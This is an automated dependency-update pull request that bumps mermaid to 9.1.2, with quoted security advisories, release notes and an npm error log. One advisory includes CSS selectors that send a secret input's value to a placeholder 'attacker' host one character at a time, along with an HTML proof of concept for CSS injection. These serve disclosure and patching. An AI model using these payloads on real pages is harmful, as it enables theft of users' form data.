fix(deps): update dependency mermaid to v9 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
mermaid	8.5.0 -> 9.1.2

GitHub Vulnerability Alerts

CVE-2021-35513

Mermaid before 8.11.0 allows XSS when the antiscript feature is used.

CVE-2021-43861

Impact

Malicious diagrams can contain javascript code that can be run at diagram readers machines.

Patches

The users should upgrade to version 8.13.8

Workarounds

You need to upgrade in order to avoid this issue.

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the value attribute one character at a time. Whenever there is an actual match, an http request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

• Open an issue in example link to repo
• Email us at example email address

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:

• https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/mermaidAPI.js#L393
• https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/styles.js#L35

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.

---

Release Notes

mermaid-js/mermaid (mermaid)

v9.1.2

Compare Source

Release Notes

🚀 Features

• Add support for cyclic themeVariable rotation when more than 8 branches (#​3049) @​ashishjain0512

• #​3060 support cherry commit in gitgraph (#​3115) @​ashishjain0512

• #​3080 Adding rotated commit label functionality (#​3113) @​ashishjain0512

• feat: adding "Critical Region"/"Option" and "Break" blocks to sequence diagram (#​3063) @​financelurker

• [Experimental] Add C4 Diagram. Compatible with C4-PlantUML syntax. (#​3038) @​pinghe

Bug Fixes & Cleanup

• #​3050 Renaming setTitle to setAccTitle (#​3051) @​knsv
• Fix for case where a compound state has a transition to it self. (#​3092) @​knsv
• Handle diagram paddings in a consistent way (#​3118) @​knsv
• Separation between title and accessibility title (sometimes) (#​3075) @​knsv
• Removed unnecessary textLength attribute. (#​3057) @​mgenereu
• Removed the Sass files (#​3114) @​siddhant-tripathy1

Documentation

• Make initThrowsErrors available to clients (#​3052) @​MindaugasLaganeckas
• Styling links default (#​3120) @​flywire
• [Documentation] Re-order theme variables (#​3030) @​sylhare
• [Documentation] Use actual theme name (#​3054) @​sylhare
• Fixed whitespace typo in Class diagram (#​3035) @​SlideeScherz
• Fixing various typos (#​3094) @​deining
• docs: fix capitalisation of well known technologies (#​3064) @​detj
• docs: remove edit on GitHub duplicate (#​3059) @​schmelto
• typos in configuration.md corrected (#​3122) @​activus-d

Dependecy updates

• chore(deps): bump dompurify from 2.3.6 to 2.3.8 (#​3045) @​dependabot
• chore(deps-dev): bump @​applitools/eyes-cypress from 3.25.7 to 3.26.0 (#​3071) @​dependabot
• chore(deps-dev): bump @​applitools/eyes-cypress from 3.26.0 to 3.26.1 (#​3105) @​dependabot
• chore(deps-dev): bump @​applitools/eyes-cypress from 3.26.1 to 3.26.2 (#​3136) @​dependabot
• chore(deps-dev): bump @​babel/core from 7.17.10 to 7.18.0 (#​3069) @​dependabot
• chore(deps-dev): bump @​babel/core from 7.18.0 to 7.18.2 (#​3083) @​dependabot
• chore(deps-dev): bump @​babel/core from 7.18.2 to 7.18.5 (#​3134) @​dependabot
• chore(deps-dev): bump @​babel/eslint-parser from 7.17.0 to 7.18.2 (#​3087) @​dependabot
• chore(deps-dev): bump @​babel/preset-env from 7.17.10 to 7.18.0 (#​3068) @​dependabot
• chore(deps-dev): bump @​babel/preset-env from 7.18.0 to 7.18.2 (#​3084) @​dependabot
• chore(deps-dev): bump @​commitlint/cli from 16.2.4 to 16.3.0 (#​3040) @​dependabot
• chore(deps-dev): bump @​commitlint/cli from 16.3.0 to 17.0.0 (#​3070) @​dependabot
• chore(deps-dev): bump @​commitlint/cli from 17.0.0 to 17.0.1 (#​3086) @​dependabot
• chore(deps-dev): bump @​commitlint/cli from 17.0.1 to 17.0.2 (#​3102) @​dependabot
• chore(deps-dev): bump @​commitlint/config-conventional from 16.2.4 to 17.0.0 (#​3067) @​dependabot
• chore(deps-dev): bump @​commitlint/config-conventional from 17.0.0 to 17.0.2 (#​3104) @​dependabot
• chore(deps-dev): bump babel-jest from 28.1.0 to 28.1.1 (#​3137) @​dependabot
• chore(deps-dev): bump concurrently from 7.1.0 to 7.2.0 (#​3039) @​dependabot
• chore(deps-dev): bump concurrently from 7.2.0 to 7.2.1 (#​3065) @​dependabot
• chore(deps-dev): bump cypress from 9.6.0 to 9.6.1 (#​3041) @​dependabot
• chore(deps-dev): bump cypress from 9.6.1 to 9.7.0 (#​3082) @​dependabot
• chore(deps-dev): bump eslint from 8.15.0 to 8.16.0 (#​3066) @​dependabot
• chore(deps-dev): bump eslint from 8.16.0 to 8.17.0 (#​3103) @​dependabot
• chore(deps-dev): bump eslint from 8.4.1 to 8.15.0 (#​3042) @​dependabot
• chore(deps-dev): bump eslint-plugin-jest from 26.1.5 to 26.2.2 (#​3044) @​dependabot
• chore(deps-dev): bump eslint-plugin-jest from 26.2.2 to 26.4.5 (#​3085) @​dependabot
• chore(deps-dev): bump eslint-plugin-jest from 26.4.5 to 26.5.3 (#​3110) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 39.2.9 to 39.3.0 (#​3072) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 39.3.0 to 39.3.2 (#​3088) @​dependabot
• chore(deps-dev): bump jest from 28.1.0 to 28.1.1 (#​3131) @​dependabot
• chore(deps-dev): bump jest-environment-jsdom from 28.1.0 to 28.1.1 (#​3129) @​dependabot
• chore(deps-dev): bump lint-staged from 12.4.1 to 12.4.2 (#​3081) @​dependabot
• chore(deps-dev): bump lint-staged from 12.4.2 to 13.0.0 (#​3109) @​dependabot
• chore(deps-dev): bump lint-staged from 13.0.0 to 13.0.1 (#​3132) @​dependabot
• chore(deps-dev): bump terser-webpack-plugin from 5.3.1 to 5.3.3 (#​3106) @​dependabot
• chore(deps-dev): bump webpack from 5.72.0 to 5.72.1 (#​3043) @​dependabot
• chore(deps-dev): bump webpack from 5.72.1 to 5.73.0 (#​3108) @​dependabot
• chore(deps-dev): bump webpack-cli from 4.9.2 to 4.10.0 (#​3130) @​dependabot
• chore(deps-dev): bump webpack-dev-server from 4.9.0 to 4.9.1 (#​3107) @​dependabot
• chore(deps-dev): bump webpack-dev-server from 4.9.1 to 4.9.2 (#​3133) @​dependabot

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.1

Compare Source

Release Notes

• Fix for #​3025 @​ashishjain0512

🎉 Thanks to all contributors helping with this release! 🎉

v9.1.0

Compare Source

Release Notes

🚀 Features

• Accessibility added to the charts (#​3008) (#​2732) @​knsv @​gwincr11 @​therzka @​khiga8 @​el-mapache @​lindseywild

• feat: add hideUnusedParticipants and some cleanup (#​2943) @​Yash-Singh1

• Added default new line in the diagram text before parsing for special… (#​2983) @​ashishjain0512

• Added support to change the position of the main branch (#​3010) @​ashishjain0512

• Sequence autonumbering and Git fix options parsing (#​2981) @​Zumbala

• GitGraph: add support for branch ordering (#​3002) @​husa

• fix mermaidAPI.parse() behavior to match documentation, add tests to ensure behavior matches docs (#​3004) @​timmaffett

• protect config.js from attempting to use invalid theme name (which corrupted mermaid use until reset()) (#​2987) @​timmaffett

• Handling flowchart link style for html labels using legacy renderer #​2951

Documentation

• Doc/update zh readme (#​3005) @​lexmin0412
• Documentation fix for 8.6.0 readme - add missing quotes to example theme default (#​2986) @​timmaffett
• Fix typos in gitgraph.md (#​2999) @​Lance-DC
• Remove a stray word (#​2974) @​egnor
• Update README.md (#​2989) @​guidanoli

Dependecy updates

• chore(deps): Included dependency review (#​2984) @​naveensrinivasan
• chore(deps): bump stylis from 4.1.0 to 4.1.1 (#​2967) @​dependabot
• chore(deps-dev): bump @​babel/core from 7.17.9 to 7.17.10 (#​2996) @​dependabot
• chore(deps-dev): bump @​babel/preset-env from 7.16.11 to 7.17.10 (#​2991) @​dependabot
• chore(deps-dev): bump @​commitlint/cli from 16.2.3 to 16.2.4 (#​2992) @​dependabot
• chore(deps-dev): bump @​commitlint/config-conventional from 16.2.1 to 16.2.4 (#​2997) @​dependabot
• chore(deps-dev): bump babel-jest from 27.5.1 to 28.0.3 (#​2990) @​dependabot
• chore(deps-dev): bump babel-jest from 28.0.3 to 28.1.0 (#​3013) @​dependabot
• chore(deps-dev): bump babel-loader from 8.2.4 to 8.2.5 (#​2964) @​dependabot
• chore(deps-dev): bump cypress from 9.5.4 to 9.6.0 (#​2998) @​dependabot
• chore(deps-dev): bump eslint from 8.13.0 to 8.14.0 (#​2966) @​dependabot
• chore(deps-dev): bump eslint from 8.14.0 to 8.15.0 (#​3015) @​dependabot
• chore(deps-dev): bump eslint-plugin-jest from 26.1.4 to 26.1.5 (#​2965) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 39.2.2 to 39.2.8 (#​2968) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 39.2.8 to 39.2.9 (#​2994) @​dependabot
• chore(deps-dev): bump husky from 7.0.4 to 8.0.0 (#​3016) @​dependabot
• chore(deps-dev): bump jest from 27.5.1 to 28.0.3 (#​2995) @​dependabot
• chore(deps-dev): bump lint-staged from 12.3.8 to 12.4.0 (#​2969) @​dependabot
• chore(deps-dev): bump lint-staged from 12.4.0 to 12.4.1 (#​2993) @​dependabot
• chore(deps-dev): bump webpack-dev-server from 4.8.1 to 4.9.0 (#​3014) @​dependabot
• chore: Enable codeql action (#​2982) @​naveensrinivasan
• chore: Set permissions for GitHub actions (#​2971) @​naveensrinivasan

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.1

Compare Source

Release Notes

🐛 Bug Fixes

• Removal of vulnerability (#​2958) @​knsv
• Fix broken re-rendering of gitGraph in Mermaid Live Editor

🎉 Thanks to all contributors helping with this release! 🎉

v9.0.0

Compare Source

Release Notes

Main feature

• 1252 gitgraph reinvented (#​2877) @​knsv

Moving the gitGraph from experimental alpha status to a fully supported diagram type which handles theming and directives. The grammar has changed slightly from the alpha version, and no longer supports reset operations and some internal fast-forwarding has been removed for simplicity. Some few GitGraphs based on the alpha version might break with the update. This is the reason for the major version number update.

We now support:

• Commit types
• Multiple branches in sperate lanes
• Theming

Other changes:

• Add dompurify config option (#​2831) @​gwincr11
• Class diagram accessibility (#​2911) @​gwincr11
• Double Circle Node Shape (#​2740) @​Guy-Adler
• ER and Sequence Chart Accessibility (#​2832) @​gwincr11
• SequenceDiagram: Use correct default sans-serif fonts for actors and tasks (#​2729) @​dbartholomae
• Update to latest version of sanitize-url (#​2790) @​dbussink
• feat: add accessibility title and description to pie chart (#​2747) @​gwincr11
• sync Chinese readme (#​2797) @​lexmin0412
• small bug with the id on the title (#​2773) @​gwincr11
• fix: autonumber bug (#​2814) @​kerwin612

Documentation updates

• Add mkdocs-material to the integrations (#​2780) @​chrimaho
• Added technical sequence diagram to example docs (#​2836) @​riaanduplessis
• Fix typo in flowchart.md (#​2741) @​mingpepe
• Fixes syntax error in n00b-gettingStarted.md (#​2735) @​bolshoytoster
• Render example instead of just showing the code (#​2835) @​Kaligule
• Switch to gender neutral terms (#​2876) @​inclusive-coding-bot
• Update theming.md (#​2855) @​Crocin
• Updated docs to use mermaid 8.14 (#​2819) @​RonaldZielaznicki
• Workflow: Check if README.md and docs/README.md are in sync (#​2755) @​kuanyi-ng
• docs(README*.md): http => https (#​2727) @​Schweinepriester
• docs(integrations): add link to mdbook-mermaid (#​2786) @​lukehsiao
• docs: Add GitHub native support (#​2725) @​BastianZim
• docs: Add Gitea (#​2731) @​silverwind
• docs: livebook and exdocs integrations (#​2728) @​RudolfMan
• docs: add showData config to Pie Chart (#​2758) @​uskey512
• docs: adds alt text to images, corrects heading structure (#​2908) @​lindseywild
• fix typos in doc (#​2787) @​dkkb

Dependency updates

• chore(deps): bump EndBug/add-and-commit from 8.0.1 to 8.0.2 (#​2722) @​dependabot
• chore(deps): bump EndBug/add-and-commit from 8.0.2 to 9 (#​2823) @​dependabot
• chore(deps): bump actions/checkout from 2 to 3 (#​2803) @​dependabot
• chore(deps): bump actions/setup-node from 2 to 3 (#​2784) @​dependabot
• chore(deps): bump dompurify from 2.3.5 to 2.3.6 (#​2763) @​dependabot
• chore(deps): bump follow-redirects from 1.14.7 to 1.14.8 (#​2711) @​dependabot
• chore(deps): bump minimist from 1.2.5 to 1.2.6 (#​2868) @​dependabot
• chore(deps): bump node-forge from 1.2.1 to 1.3.0 (#​2847) @​dependabot
• chore(deps): bump stylis from 4.0.13 to 4.1.0 (#​2891) @​dependabot
• chore(deps-dev): bump @​babel/core from 7.17.0 to 7.17.2 (#​2716) @​dependabot
• chore(deps-dev): bump @​babel/core from 7.17.2 to 7.17.5 (#​2766) @​dependabot
• chore(deps-dev): bump @​babel/core from 7.17.5 to 7.17.8 (#​2838) @​dependabot
• chore(deps-dev): bump @​babel/register from 7.17.0 to 7.17.7 (#​2844) @​dependabot
• chore(deps-dev): bump @​commitlint/cli from 16.1.0 to 16.2.1 (#​2719) @​dependabot
• chore(deps-dev): bump @​commitlint/cli from 16.2.1 to 16.2.3 (#​2843) @​dependabot
• chore(deps-dev): bump @​commitlint/config-conventional from 16.0.0 to 16.2.1 (#​2718) @​dependabot
• chore(deps-dev): bump @​percy/cli from 1.0.0-beta.74 to 1.0.0-beta.75 (#​2715) @​dependabot
• chore(deps-dev): bump @​percy/cli from 1.0.0-beta.75 to 1.0.0-beta.76 (#​2782) @​dependabot
• chore(deps-dev): bump babel-jest from 27.5.0 to 27.5.1 (#​2720) @​dependabot
• chore(deps-dev): bump babel-loader from 8.2.3 to 8.2.4 (#​2862) @​dependabot
• chore(deps-dev): bump concurrently from 7.0.0 to 7.1.0 (#​2889) @​dependabot
• chore(deps-dev): bump cypress from 9.4.1 to 9.5.0 (#​2762) @​dependabot
• chore(deps-dev): bump cypress from 9.5.0 to 9.5.1 (#​2800) @​dependabot
• chore(deps-dev): bump cypress from 9.5.1 to 9.5.2 (#​2837) @​dependabot
• chore(deps-dev): bump cypress from 9.5.2 to 9.5.3 (#​2890) @​dependabot
• chore(deps-dev): bump eslint from 8.10.0 to 8.11.0 (#​2821) @​dependabot
• chore(deps-dev): bump eslint from 8.11.0 to 8.12.0 (#​2867) @​dependabot
• chore(deps-dev): bump eslint from 8.8.0 to 8.9.0 (#​2713) @​dependabot
• chore(deps-dev): bump eslint from 8.9.0 to 8.10.0 (#​2783) @​dependabot
• chore(deps-dev): bump eslint-config-prettier from 8.3.0 to 8.4.0 (#​2761) @​dependabot
• chore(deps-dev): bump eslint-config-prettier from 8.4.0 to 8.5.0 (#​2798) @​dependabot
• chore(deps-dev): bump eslint-plugin-jest from 26.1.0 to 26.1.1 (#​2760) @​dependabot
• chore(deps-dev): bump eslint-plugin-jest from 26.1.1 to 26.1.2 (#​2841) @​dependabot
• chore(deps-dev): bump eslint-plugin-jest from 26.1.2 to 26.1.3 (#​2864) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 37.7.1 to 37.9.1 (#​2714) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 37.9.1 to 37.9.4 (#​2764) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 37.9.4 to 37.9.7 (#​2801) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 37.9.7 to 38.0.3 (#​2820) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 38.0.3 to 38.0.6 (#​2840) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 38.0.6 to 38.1.1 (#​2863) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 38.1.1 to 38.1.6 (#​2893) @​dependabot
• chore(deps-dev): bump jest from 27.5.0 to 27.5.1 (#​2717) @​dependabot
• chore(deps-dev): bump lint-staged from 12.3.3 to 12.3.4 (#​2721) @​dependabot
• chore(deps-dev): bump lint-staged from 12.3.4 to 12.3.5 (#​2799) @​dependabot
• chore(deps-dev): bump lint-staged from 12.3.5 to 12.3.7 (#​2839) @​dependabot
• chore(deps-dev): bump moment from 2.29.1 to 2.29.2 (#​2888) @​dependabot
• chore(deps-dev): bump prettier from 2.5.1 to 2.6.0 (#​2842) @​dependabot
• chore(deps-dev): bump prettier from 2.6.0 to 2.6.1 (#​2866) @​dependabot
• chore(deps-dev): bump prettier from 2.6.1 to 2.6.2 (#​2887) @​dependabot
• chore(deps-dev): bump prettier-plugin-jsdoc from 0.3.30 to 0.3.31 (#​2822) @​dependabot
• chore(deps-dev): bump prettier-plugin-jsdoc from 0.3.31 to 0.3.33 (#​2865) @​dependabot
• chore(deps-dev): bump prettier-plugin-jsdoc from 0.3.33 to 0.3.36 (#​2892) @​dependabot
• chore(deps-dev): bump webpack from 5.68.0 to 5.69.1 (#​2765) @​dependabot
• chore(deps-dev): bump webpack from 5.69.1 to 5.70.0 (#​2802) @​dependabot
• chore(deps-dev): bump webpack from 5.70.0 to 5.71.0 (#​2894) @​dependabot

🎉 Thanks to all contributors helping with this release! 🎉

v8.14.0

Compare Source

Release Notes

Main feature

• Adding new more secure security level 'sandbox' where all rendering happens in a sandboxed iframe. The returned element in this mode is also an iframe with the svg as a base64 encoded url. (#​2654)

Documentation updates

• Documention updates in the main mardownfile in the repo adding mermaid diagrams instead of images of mermaid diagrams (#​2676) @​knsv
• Reference mkdocs-mermaid2-plugin for MkDocs (#​2702) @​jfuentescpp
• docs: update for re-ordering (#​2704) @​arfanliaqat
• sync Chinese readme contents (#​2656) @​lexmin0412

Dependecy updates

• Bump @​babel/core from 7.16.7 to 7.16.12 (#​2658) @​dependabot
• Bump @​babel/preset-env from 7.16.8 to 7.16.11 (#​2660) @​dependabot
• Bump @​commitlint/cli from 16.0.2 to 16.1.0 (#​2664) @​dependabot
• Bump EndBug/add-and-commit from 7 to 8.0.1 (#​2665) @​dependabot
• Bump cached-path-relative from 1.0.2 to 1.1.0 (#​2671) @​dependabot
• Bump cypress from 9.2.1 to 9.3.1 (#​2663) @​dependabot
• Bump eslint-plugin-jsdoc from 37.6.1 to 37.6.3 (#​2662) @​dependabot
• Bump lint-staged from 12.1.7 to 12.3.1 (#​2661) @​dependabot
• Bump webpack from 5.66.0 to 5.67.0 (#​2659) @​dependabot
• chore(deps): bump dompurify from 2.3.4 to 2.3.5 (#​2683) @​dependabot
• chore(deps-dev): bump @​babel/core from 7.16.12 to 7.17.0 (#​2697) @​dependabot
• chore(deps-dev): bump @​babel/eslint-parser from 7.16.5 to 7.17.0 (#​2700) @​dependabot
• chore(deps-dev): bump @​babel/register from 7.16.9 to 7.17.0 (#​2699) @​dependabot
• chore(deps-dev): bump @​percy/cli from 1.0.0-beta.73 to 1.0.0-beta.74 (#​2680) @​dependabot
• chore(deps-dev): bump babel-jest from 27.4.6 to 27.5.0 (#​2701) @​dependabot
• chore(deps-dev): bump cypress from 9.3.1 to 9.4.1 (#​2692) @​dependabot
• chore(deps-dev): bump eslint from 8.7.0 to 8.8.0 (#​2682) @​dependabot
• chore(deps-dev): bump eslint-plugin-jest from 25.7.0 to 26.0.0 (#​2679) @​dependabot
• chore(deps-dev): bump eslint-plugin-jest from 26.0.0 to 26.1.0 (#​2693) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 37.6.3 to 37.7.0 (#​2681) @​dependabot
• chore(deps-dev): bump eslint-plugin-jsdoc from 37.7.0 to 37.7.1 (#​2690) @​dependabot
• chore(deps-dev): bump jest from 27.4.7 to 27.5.0 (#​2696) @​dependabot
• chore(deps-dev): bump lint-staged from 12.3.1 to 12.3.2 (#​2684) @​dependabot
• chore(deps-dev): bump lint-staged from 12.3.2 to 12.3.3 (#​2691) @​dependabot
• chore(deps-dev): bump terser-webpack-plugin from 5.3.0 to 5.3.1 (#​2694) @​dependabot
• chore(deps-dev): bump webpack from 5.67.0 to 5.68.0 (#​2698) @​dependabot
• chore(deps-dev): bump webpack-cli from 4.9.1 to 4.9.2 (#​2678) @​dependabot
• chore(deps-dev): bump webpack-dev-server from 4.7.3 to 4.7.4 (#​2695) @​dependabot

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.10

Compare Source

Release Notes

• 2646 Removes a possible way for a diagram author to trigger a JavaScript using in diagram code. (#​2655) @​knsv
• Bump @​babel/preset-env from 7.16.7 to 7.16.8 (#​2642) @​dependabot
• Bump @​babel/register from 7.16.7 to 7.16.9 (#​2639) @​dependabot
• Bump @​percy/cli from 1.0.0-beta.71 to 1.0.0-beta.73 (#​2638) @​dependabot
• Bump cypress from 9.2.0 to 9.2.1 (#​2636) @​dependabot
• Bump eslint from 8.6.0 to 8.7.0 (#​2637) @​dependabot
• Bump eslint-plugin-jest from 25.3.4 to 25.7.0 (#​2640) @​dependabot
• Bump webpack from 5.65.0 to 5.66.0 (#​2635) @​dependabot
• Bump webpack-dev-server from 4.7.2 to 4.7.3 (#​2641) @​dependabot
• Remove console.log from common.js (#​2621) @​Billiam
• docs: Update sequenceDiagram.md: remove a duplication (#​2624) @​hiramekun

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.9

Compare Source

Release Notes

Changes to the functionality

• chore: make husky hooks executable (#​2594) @​Yash-Singh1
• fix: bug #​2346 "ER-attribute comments not work" (#​2598) @​ebjornset
• fix: bug #​2631 Fix for more robust rendering of gitGraph @​knsv
• fix: bug #​2632 Fix for XSS vulnerability in classDiagrams @​knsv

Documentation changes

• Add Notion to integrations.md (#​2593) @​kale-stew
• Added Mermaid in open source docs to tutorial page (#​2613) @​chrismetz09
• Change "graph" to "flowchart" (#​2612) @​Erhannis
• Fix documentation full examples (#​2615) @​magmax
• Fix typo (#​2614) @​meganemura
• docs: fix broken image links in gantt.md (#​2599) @​esphas

Dependency updates

• Bump @​babel/core from 7.16.5 to 7.16.7 (#​2610) @​dependabot
• Bump @​babel/preset-env from 7.16.5 to 7.16.7 (#​2602) @​dependabot
• Bump @​babel/register from 7.16.5 to 7.16.7 (#​2601) @​dependabot
• Bump @​commitlint/cli from 16.0.0 to 16.0.1 (#​2607) @​dependabot
• Bump @​commitlint/cli from 16.0.1 to 16.0.2 (#​2619) @​dependabot
• Bump babel-jest from 27.4.5 to 27.4.6 (#​2616) @​dependabot
• Bump concurrently from 6.5.1 to 7.0.0 (#​2603) @​dependabot
• Bump eslint from 8.5.0 to 8.6.0 (#​2608) @​dependabot
• Bump eslint-plugin-jest from 25.3.0 to 25.3.4 (#​2609) @​dependabot
• Bump eslint-plugin-jsdoc from 37.4.0 to 37.5.0 (#​2605) @​dependabot
• Bump eslint-plugin-jsdoc from 37.5.0 to 37.6.1 (#​2620) @​dependabot
• Bump follow-redirects from 1.14.6 to 1.14.7 (#​2625) @​dependabot
• Bump jest from 27.4.5 to 27.4.7 (#​2618) @​dependabot
• Bump lint-staged from 12.1.4 to 12.1.5 (#​2604) @​dependabot
• Bump lint-staged from 12.1.5 to 12.1.7 (#​2617) @​dependabot
• Bump webpack-dev-server from 4.7.1 to 4.7.2 (#​2606) @​dependabot

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.8

Compare Source

Release Notes

• Fix for vulnerability with links from actors in sequence diagrams

• Fix for insuffiucient url sanitization (#​2596)

• Add Notion to integrations.md (#​2593) @​kale-stew

• Update TiddlyWiki integrations (#​2584) @​jasonmhoule

• Bump @​commitlint/cli from 15.0.0 to 16.0.0 (#​2590) @​dependabot

• Bump @​commitlint/config-conventional from 15.0.0 to 16.0.0 (#​2591) @​dependabot

• Bump cypress from 9.1.1 to 9.2.0 (#​2586) @​dependabot

• Bump eslint-plugin-jsdoc from 37.3.0 to 37.4.0 (#​2589) @​dependabot

• Bump lint-staged from 12.1.3 to 12.1.4 (#​2587) @​dependabot

• Bump webpack-dev-server from 4.6.0 to 4.7.1 (#​2588) @​dependabot

• Bump @​babel/core from 7.16.0 to 7.16.5 (#​2575) @​dependabot

• Bump @​babel/eslint-parser from 7.16.3 to 7.16.5 (#​2579) @​dependabot

• Bump @​babel/preset-env from 7.16.4 to 7.16.5 (#​2576) @​dependabot

• Bump @​babel/register from 7.16.0 to 7.16.5 (#​2569) @​dependabot

• Bump babel-jest from 27.4.4 to 27.4.5 (#​2571) @​dependabot

• Bump concurrently from 6.4.0 to 6.5.1 (#​2570) @​dependabot

• Bump eslint from 8.4.1 to 8.5.0 (#​2572) @​dependabot

• Bump eslint-plugin-jsdoc from 37.2.0 to 37.3.0 (#​2573) @​dependabot

• Bump jest from 27.4.4 to 27.4.5 (#​2578) @​dependabot

• Bump lint-staged from 12.1.2 to 12.1.3 (#​2577) @​dependabot

• Bump terser-webpack-plugin from 5.2.5 to 5.3.0 (#​2574) @​dependabot

🎉 Thanks to all contributors helping with this release! 🎉

v8.13.7

[Compare Source](https://togithub.com/mermaid-js/mermaid/compar

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: web/package-lock.json

npm warn ERESOLVE overriding peer dependency
npm warn While resolving: @jimp/plugin-threshold@0.10.3
npm warn Found: @jimp/plugin-color@0.6.8
npm warn node_modules/@jimp/plugin-color
npm warn   @jimp/plugin-color@"^0.6.8" from @jimp/plugins@0.6.8
npm warn   node_modules/@jimp/plugins
npm warn     @jimp/plugins@"^0.6.8" from jimp@0.6.8
npm warn     node_modules/jimp
npm warn
npm warn Could not resolve dependency:
npm warn peer @jimp/plugin-color@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn node_modules/@jimp/plugin-threshold
npm warn   @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn   node_modules/potrace/node_modules/@jimp/plugins
npm warn
npm warn Conflicting peer dependency: @jimp/plugin-color@0.22.12
npm warn node_modules/@jimp/plugin-color
npm warn   peer @jimp/plugin-color@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn   node_modules/@jimp/plugin-threshold
npm warn     @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn     node_modules/potrace/node_modules/@jimp/plugins
npm warn ERESOLVE overriding peer dependency
npm warn While resolving: @jimp/plugin-threshold@0.10.3
npm warn Found: @jimp/plugin-resize@0.6.8
npm warn node_modules/@jimp/plugin-resize
npm warn   peer @jimp/plugin-resize@">=0.3.5" from @jimp/plugin-contain@0.6.8
npm warn   node_modules/@jimp/plugin-contain
npm warn     @jimp/plugin-contain@"^0.6.8" from @jimp/plugins@0.6.8
npm warn     node_modules/@jimp/plugins
npm warn   5 more (@jimp/plugin-cover, @jimp/plugin-rotate, ...)
npm warn
npm warn Could not resolve dependency:
npm warn peer @jimp/plugin-resize@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn node_modules/@jimp/plugin-threshold
npm warn   @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn   node_modules/potrace/node_modules/@jimp/plugins
npm warn
npm warn Conflicting peer dependency: @jimp/plugin-resize@0.22.12
npm warn node_modules/@jimp/plugin-resize
npm warn   peer @jimp/plugin-resize@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn   node_modules/@jimp/plugin-threshold
npm warn     @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn     node_modules/potrace/node_modules/@jimp/plugins
npm error code ERESOLVE
npm error ERESOLVE could not resolve
npm error
npm error While resolving: eslint-watch@7.0.0
npm error Found: eslint@8.2.0
npm error node_modules/eslint
npm error   dev eslint@"8.2.0" from the root project
npm error   peer eslint@">= 4.12.1" from babel-eslint@10.1.0
npm error   node_modules/babel-eslint
npm error     dev babel-eslint@"10.1.0" from the root project
